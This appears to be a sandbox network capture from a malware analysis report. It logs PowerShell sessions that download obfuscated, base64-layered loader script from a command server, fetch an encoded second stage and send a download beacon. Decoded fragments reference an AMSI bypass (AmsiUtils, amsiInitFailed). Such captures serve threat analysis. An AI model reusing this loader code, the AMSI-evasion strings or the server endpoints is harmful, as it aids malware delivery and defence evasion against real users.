                                                                                                        Nov 8, 2024 11:12:37.782723904 CET164OUTGET /client/ws HTTP/1.1
                                                                                                        Host: 23.88.71.29:8000
                                                                                                        Connection: Upgrade
                                                                                                        Upgrade: websocket
                                                                                                        Sec-WebSocket-Key: C0g8OClejEe5E7Qdk4mqPg==
                                                                                                        Sec-WebSocket-Version: 13
                                                                                                        Nov 8, 2024 11:12:38.577191114 CET1289INHTTP/1.1 404 Not Found
                                                                                                        Cache-Control: private
                                                                                                        Upgrade: websocket
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BbFNIDSw%2FOhNbordaH1JngoWKM3T6m0qynYQM0FO4Ogfm6ZgE1tEsoB2pNYy8XzOmd7KURCN%2F0WAWeZUWG0gnD%2FEbZqaIAQsRHA%2FhIzuWxdIc79rySMki7glPS7I47voYROJwbY%2FjvMF"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        CF-RAY: 8df4c928c8962a08-CDG
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=24249&sent=3201&recv=1243&lost=0&retrans=0&sent_bytes=2856030&recv_bytes=153722&delivery_rate=664197&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Date: Fri, 08 Nov 2024 10:12:38 GMT
                                                                                                        Content-Length: 4852
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} p


                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.11.3049760172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:29 UTC169OUTGET /sybpc HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-08 10:10:30 UTC983INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:30 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 6425
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ytaE3jndJj58%2F4xbA0QSmjMmDxSYYiCCTYMcauLlgnroK%2BxZLHtOn8YuitYhtXtWooDO4iR0laloXu0gBuAUJZ0a%2FC10Z8yzcz%2BHWmcAjTg%2Bk4Ftpa2kwuTwVkZpiw%2FQrp4UhahbIeH1"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=54161&sent=86&recv=105&lost=0&retrans=0&sent_bytes=22567&recv_bytes=63621&delivery_rate=1929940&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c60aaef3616f-ORD
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=121026&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=783&delivery_rate=31610&cwnd=33&unsent_bytes=0&cid=90eb7dd1f2cfeb52&ts=885&x=0"
                                                                                                        2024-11-08 10:10:30 UTC386INData Raw: 24 6f 73 66 66 72 66 62 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 6a 4a 4f 62 47 4d 7a 54 57 64 6d 51 30 4a 4f 57 6c 64 47 65 6d 52 59 53 6d 78 4d 56 54 6c 70 59 57 31 57 61 6d 52 44 61 33 56 52 4d 6a 6b 78 59 6d 35 52 4e 30 52 52 62 32 74 61 55 30 45 35 53 55 5a 30 56 47 56 59 54 6a 42 61 56 7a 42 31 56 6c 68 4b 63 46 68 55 62 7a 5a 53 57 45 35 71 57 56 68 43 62 46 4a 48 52 6a 42 5a 56 6b 34 77 59 32 31 73 64 56 70 35 61 47 4a 53 56 7a 55 79 59 56 68 4b 64 6d 4a 74 4d 57 78 69 62 6c 4a 6b 54 32 70 77 56 6d 4d 79 56 6e 6c 55 62 55 5a 30 57 6c 4e 72 4e 30 52 52 62 32
                                                                                                        Data Ascii: $osffrfb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YjJObGMzTWdmQ0JOWldGemRYSmxMVTlpYW1WamRDa3VRMjkxYm5RN0RRb2taU0E5SUZ0VGVYTjBaVzB1VlhKcFhUbzZSWE5qWVhCbFJHRjBZVk4wY21sdVp5aGJSVzUyYVhKdmJtMWxiblJkT2pwVmMyVnlUbUZ0WlNrN0RRb2
                                                                                                        2024-11-08 10:10:30 UTC1369INData Raw: 45 5a 72 54 31 52 57 62 55 39 45 53 54 46 4f 52 45 55 7a 54 31 64 56 64 31 70 45 57 54 56 4f 62 56 70 72 54 6d 70 57 61 30 39 45 5a 7a 4e 4e 65 6b 35 74 57 57 70 61 62 45 30 79 54 6d 70 4e 56 47 4e 36 54 58 70 46 65 56 6c 55 53 6d 74 4f 56 46 55 7a 54 6c 64 5a 65 6b 39 48 57 54 4a 5a 56 30 35 70 54 31 52 6f 61 46 6c 74 52 58 68 4e 56 45 4a 70 57 56 52 42 4d 55 35 74 53 54 4a 4e 4d 6c 70 73 54 31 52 42 4d 6b 35 71 61 47 68 50 56 31 55 77 57 54 4a 52 4d 55 39 58 56 54 4a 5a 65 6b 45 31 54 57 31 56 4d 56 70 55 52 54 52 61 62 55 6b 30 57 57 70 6e 64 30 35 36 51 54 56 4e 61 6c 4a 73 54 6d 31 4e 4d 55 31 58 53 54 42 61 62 55 35 74 54 30 64 57 61 31 6c 55 55 6d 31 5a 56 45 4a 73 57 6b 52 6a 4d 46 6c 71 54 54 56 4e 4d 6c 46 33 57 6b 52 6a 64 30 39 55 53 54 4e 5a
                                                                                                        Data Ascii: EZrT1RWbU9ESTFOREUzT1dVd1pEWTVObVprTmpWa09EZzNNek5tWWpabE0yTmpNVGN6TXpFeVlUSmtOVFUzTldZek9HWTJZV05pT1RoaFltRXhNVEJpWVRBMU5tSTJNMlpsT1RBMk5qaGhPV1UwWTJRMU9XVTJZekE1TW1VMVpURTRabUk0WWpnd056QTVNalJsTm1NMU1XSTBabU5tT0dWa1lUUm1ZVEJsWkRjMFlqTTVNMlF3WkRjd09USTNZ
                                                                                                        2024-11-08 10:10:30 UTC1369INData Raw: 55 30 46 70 56 54 42 57 54 56 4a 56 54 6c 56 4a 51 32 39 6e 55 6d 78 4b 55 46 52 54 51 6b 4a 69 62 6c 4a 77 5a 47 31 73 65 57 52 59 54 6c 46 6a 62 54 6c 72 5a 46 64 4f 4d 45 6c 70 51 6a 68 4a 52 6b 35 73 59 6b 64 57 61 6d 52 44 4d 56 42 5a 62 58 42 73 57 54 4e 52 5a 30 78 56 56 6a 52 6a 52 30 5a 31 57 6b 5a 43 65 57 49 7a 51 6d 78 6a 62 6c 49 31 53 55 64 53 63 47 4d 7a 51 6e 4e 5a 57 47 78 50 57 56 63 78 62 45 74 54 51 58 52 68 62 54 6c 77 59 6d 6c 42 61 55 78 44 53 58 42 50 65 55 4a 77 57 6d 6c 42 62 31 63 7a 54 6a 42 6a 62 57 78 31 57 6a 45 77 4e 6b 39 72 62 48 70 55 62 6c 5a 7a 59 6b 55 35 65 56 4a 58 4d 58 64 6b 53 47 74 76 53 6b 64 46 63 45 74 54 51 6a 64 4a 51 31 4a 6f 53 55 51 77 5a 30 6c 75 56 6e 56 68 4d 6a 56 32 5a 44 49 30 61 55 6c 49 4d 47 64
                                                                                                        Data Ascii: U0FpVTBWTVJVTlVJQ29nUmxKUFRTQkJiblJwZG1seWRYTlFjbTlrZFdOMElpQjhJRk5sYkdWamRDMVBZbXBsWTNRZ0xVVjRjR0Z1WkZCeWIzQmxjblI1SUdScGMzQnNZWGxPWVcxbEtTQXRhbTlwYmlBaUxDSXBPeUJwWmlBb1czTjBjbWx1WjEwNk9rbHpUblZzYkU5eVJXMXdkSGtvSkdFcEtTQjdJQ1JoSUQwZ0luVnVhMjV2ZDI0aUlIMGd
                                                                                                        2024-11-08 10:10:30 UTC1369INData Raw: 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 56 64 53 61 30 78 57 55 6a 56 6a 52 31 56 6e 54 46 5a 53 4e 57 4e 48 56 6b 56 61 56 31 70 77 59 6d 31 73 4d 47 46 58 4f 58 56 4a 51 32 51 78 59 7a 4a 73 64 56 70 35 51 6c 52 6c 57 45 34 77 57 6c 63 77 4e 30 6c 49 56 6e 70 68 56 7a 56 75 22 29 29 3b 0a 24 63 74 71 73 72 74 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 64 57 4a 73 61 57 4d 73 55 33 52 68 64 47 6c 6a 22 29 29 3b 0a 24 6b 78 78 76 66 6e 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74
                                                                                                        Data Ascii: ert]::FromBase64String("UVdSa0xWUjVjR1VnTFZSNWNHVkVaV1pwYm1sMGFXOXVJQ2QxYzJsdVp5QlRlWE4wWlcwN0lIVnphVzVu"));$ctqsrt=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dWJsaWMsU3RhdGlj"));$kxxvfn=[System.Text.Encoding]::ASCII.Get
                                                                                                        2024-11-08 10:10:30 UTC515INData Raw: 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 47 56 74 4c 6b 52 70 59 51 3d 3d 22 29 29 3b 0a 24 73 74 73 69 77 6f 73 78 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 65 58 4e 30 5a 57 30 75 51 32 39 79 5a 51 3d 3d 22 29 29 3b 0a 24 6c 7a 79 79 65 6c 78 6d 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 77 3d 3d 22 29 29 3b 0a 24 78 6f 75 67 79 6b 3d 5b 53 79 73 74 65 6d 2e 54 65 78
                                                                                                        Data Ascii: ase64String("U3lzdGVtLkRpYQ=="));$stsiwosx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uQ29yZQ=="));$lzyyelxm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));$xougyk=[System.Tex
                                                                                                        2024-11-08 10:10:31 UTC1369INData Raw: 36 34 53 74 72 69 6e 67 28 22 62 58 4e 70 53 57 35 70 64 45 5a 68 61 57 78 6c 5a 41 3d 3d 22 29 29 3b 0a 24 67 74 79 78 75 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 51 3d 3d 22 29 29 3b 0a 24 66 74 6b 76 66 61 68 72 62 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 57 56 75 64 43 35 42 64 58 52 76 62 57 46 30 61 57 39 75 4c 6b 46 74 63 32 6c 56 64 47 6c 73 63 77 3d 3d 22 29 29 3b 0a
                                                                                                        Data Ascii: 64String("bXNpSW5pdEZhaWxlZA=="));$gtyxu=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));$ftkvfahrb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscw=="));
                                                                                                        2024-11-08 10:10:31 UTC48INData Raw: 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 28 24 65 78 77 73 69 65 65 20 2b 20 24 6f 73 66 66 72 66 62 29 29 29 29 3b 0a
                                                                                                        Data Ascii: rt]::FromBase64String(($exwsiee + $osffrfb))));


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.11.3049761172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:32 UTC374OUTGET /file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3cc173312a2d5575f38f6acb98aba110ba056b63fe90668a9e4cd59e6c092e5e18fb8b8070924e6c51b4fcf8eda4fa0ed74b393d0d70927b6997b6ba5903a852/Windows%20Defender/16/16/user/204 HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        2024-11-08 10:10:33 UTC1048INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:33 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 2884
                                                                                                        Connection: close
                                                                                                        content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZOYHkX8u1FnUJietZGhNDNS7zoIrEp2a%2FEbL0MIyaKpIgJJ8XXyzKwq1gm8s0cSVWX4uhxjjobYPoEJK4OSqBYtq2CwOGWko8uN9gdSzLKLw2ZLfEbOr0ggNYhov7HukUbgMH8YcKxNe"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=47580&sent=92&recv=107&lost=0&retrans=0&sent_bytes=29770&recv_bytes=64635&delivery_rate=4821664&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c619381b0c9d-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102096&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1012&delivery_rate=37411&cwnd=252&unsent_bytes=0&cid=e2cedf82a7fd3654&ts=809&x=0"
                                                                                                        2024-11-08 10:10:33 UTC321INData Raw: 25 6c 6b 70 78 6e 70 78 78 66 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 63 57 54 30 56 6d 53 4b 4f 47 6d 54 60 46 6d 4f 53 47 5b 73 56 6d 53 57 64 6a 34 70 53 55 43 4e 57 30 5b 70 55 59 71 57 4f 54 38 54 5b 46 6d 51 53 47 54 78 55 56 71 53 4c 6a 34 37 50 6c 71 4f 64 6a 6d 35 55 57 53 6f 65 30 71 54 58 7b 4b 5b 63 54 5b 73 55 6c 71 6f 4f 57 71 54 55 55 47 5b 57 44 34 70 55 30 65 4f 4c 57 6d 37 50 6c 75 5b 60 6c 4f 37 56 55 4b 57 4c 31 30 44 55 6c 79 51 50 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 6a 52 44 6e 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 69 7b
                                                                                                        Data Ascii: %lkpxnpxxf<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#cWT0VmSKOGmT`FmOSG[sVmSWdj4pSUCNW0[pUYqWOT8T[FmQSGTxUVqSLj47PlqOdjm5UWSoe0qTX{K[cT[sUlqoOWqTUUG[WD4pU0eOLWm7Plu[`lO7VUKWL10DUlyQP1j2SGGw[1mEPVejRDn0SGGw[1mEPVeKP1GoRTi{
                                                                                                        2024-11-08 10:10:33 UTC1369INData Raw: 44 78 4e 59 57 6a 63 57 5b 34 5b 44 5b 52 65 6a 79 57 62 49 71 68 4c 6b 50 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6a 71 68 63 6d 71 33 58 55 4b 57 65 47 58 78 57 6c 6d 57 63 57 5b 35 5b 47 65 56 64 6c 53 45 50 59 53 56 56 44 71 76 52 54 4f 52 4c 56 4f 75 60 33 65 4c 57 55 47 72 5b 44 65 6e 65 6d 71 45 50 6d 47 68 4c 31 35 76 52 54 4c 79 52 57 71 59 53 6c 75 60 56 44 71 37 52 54 4f 52 63 30 71 59 53 6c 75 60 56 44 71 37 52 54 4c 79 50 33 48 78 54 6b 57 4b 50 30 4b 71 58 6b 4b 52 4f 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 4c 44 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 5b 4c 6a 58 76 56 55 4b 6e 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 4e 50 33 6d 43 5b
                                                                                                        Data Ascii: DxNYWjcW[4[D[RejyWbIqhLkP2SGGw[1mEPVeKP1GoRTOC[1mEPjqhcmq3XUKWeGXxWlmWcW[5[GeVdlSEPYSVVDqvRTORLVOu`3eLWUGr[DenemqEPmGhL15vRTLyRWqYSlu`VDq7RTORc0qYSlu`VDq7RTLyP3HxTkWKP0KqXkKROTSSc3eKP1GoRTOC[1mHLD4E`TGoRTOC[1mEPVe[LjXvVUKnO1SSc3eKP1GoRTOC[1mEPVeKP1GNP3mC[
                                                                                                        2024-11-08 10:10:33 UTC1194INData Raw: 6c 71 60 53 30 57 34 56 56 71 46 60 31 38 59 54 6c 30 4e 53 30 44 78 55 57 53 53 64 54 34 59 56 55 43 60 60 6a 30 34 55 6c 71 56 60 31 30 75 57 6c 75 4e 63 57 4b 73 55 6d 53 72 60 31 38 54 60 46 79 5b 57 47 54 30 55 31 53 60 63 54 34 44 57 6c 69 5b 64 6c 62 7b 56 6a 53 42 60 31 34 75 54 55 4b 5b 4c 6a 30 37 55 6a 65 4b 4f 44 30 54 55 59 6d 5b 64 6a 6d 32 56 6a 53 43 64 6d 6d 37 5b 32 69 60 57 46 72 30 55 6a 53 53 64 54 35 78 54 6c 79 4e 63 57 71 6e 55 54 65 47 65 31 30 49 54 55 57 60 53 31 5b 73 55 54 53 6f 4c 30 6a 78 56 55 43 4f 60 6c 53 70 56 56 71 53 64 44 30 70 60 7b 43 51 53 47 54 7b 56 6d 53 4f 4c 47 71 70 56 55 57 4f 57 31 5b 73 55 6c 71 4b 64 54 30 49 53 59 65 4f 63 57 4b 6e 56 6d 65 52 60 44 34 59 52 59 6d 51 53 46 65 35 56 6d 53 6e 60 31 34 54
                                                                                                        Data Ascii: lq`S0W4VVqF`18YTl0NS0DxUWSSdT4YVUC``j04UlqV`10uWluNcWKsUmSr`18T`Fy[WGT0U1S`cT4DWli[dlb{VjSB`14uTUK[Lj07UjeKOD0TUYm[djm2VjSCdmm7[2i`WFr0UjSSdT5xTlyNcWqnUTeGe10ITUW`S1[sUTSoL0jxVUCO`lSpVVqSdD0p`{CQSGT{VmSOLGqpVUWOW1[sUlqKdT0ISYeOcWKnVmeR`D4YRYmQSFe5VmSn`14T


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.11.3049762172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:33 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad689e35a3c9c5c0db73ce703e8 HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 308
                                                                                                        2024-11-08 10:10:33 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 63 35 37 63 32 30 36 35 34 62 34 33 34 33 62 65 34 39 30 37 66 62 61 63 37 66 31 32 36 32 64 36 61 37 39 63 63 37 33 66 64 32 38 38 36 64 63 66 65 35 66 63 38 33 31 32 37 35 34 62 65 30 63 64 65 32 62 31 64 39 64 66 34 64 36 31 34 32 35 66 34 66 33 32 36 35 64 32 65 64 36 64 64 35 39 64 39 38 65 61 35 39 38 36 66 34 35 61 63 38 37 64 30 64 36 64 36 63 63 33 34 62 38 31 33 32 63 32 30 64 30 33 63 38 31 65 39 39 34 34 32 37 64 65 36 66 61 30 61 30 30 64 39 64 61 64 30 38 37 63 66 34 32 37 63 62 34 31 32 39 34 38 35 37 65 33 34 66 36 39 31 61 64 36 32 32 30 61 30 32 64 61 65 64 61 35
                                                                                                        Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2b1d9df4d61425f4f3265d2ed6dd59d98ea5986f45ac87d0d6d6cc34b8132c20d03c81e994427de6fa0a00d9dad087cf427cb41294857e34f691ad6220a02daeda5
                                                                                                        2024-11-08 10:10:34 UTC943INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:34 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ilRdzqKNX%2FjH7GY2IyP1%2FCSpRRAoqq0k2yw3N2SGMvj7ITNKHaoJuZkmZ%2FcMsneI%2FLoXMyh2poR1jodnz2XVbqGnHop1Q9H7%2BZR4OiAcgdxsT%2FpfNsmQGugoI16LYAW1jfNpkFnP1ve"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=39378&sent=100&recv=114&lost=0&retrans=0&sent_bytes=34236&recv_bytes=66677&delivery_rate=4821664&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6209d7bc3f3-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102130&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1258&delivery_rate=37482&cwnd=252&unsent_bytes=0&cid=dcdafc1c24051367&ts=816&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.11.3049763172.67.137.624431276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:10:34 UTC370OUTGET /file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2b1d9df4d61425f4f3265d2ed6dd59d98ea5986f45ac87d0d6d6cc34b8132c20d03c81e994427de6fa0a00d9dad087cf427cb41294857e34f691ad6220a02daeda5b2881e8d53cf9b2b7b5bffebebda HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        2024-11-08 10:10:35 UTC1059INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:10:35 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 2872
                                                                                                        Connection: close
                                                                                                        content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zLM%2B6D%2FpFxx26cqIdm2DVubEPiROCv1gvEZt6n%2B7AVEIEXu4XvhHK0SCP5vgyb8FRhiubzv2gayTyqY7sLY4gcTdU9ZhzRUAdQpv5JLHVF%2FvxWQy%2FW%2BwOhjXxc8Ugw1hcPmSBchgFRW"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=41098&sent=102&recv=116&lost=0&retrans=0&sent_bytes=34986&recv_bytes=67684&delivery_rate=4821664&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c6273c15c34a-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102392&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1008&delivery_rate=37266&cwnd=250&unsent_bytes=0&cid=a392251776b79184&ts=803&x=0"
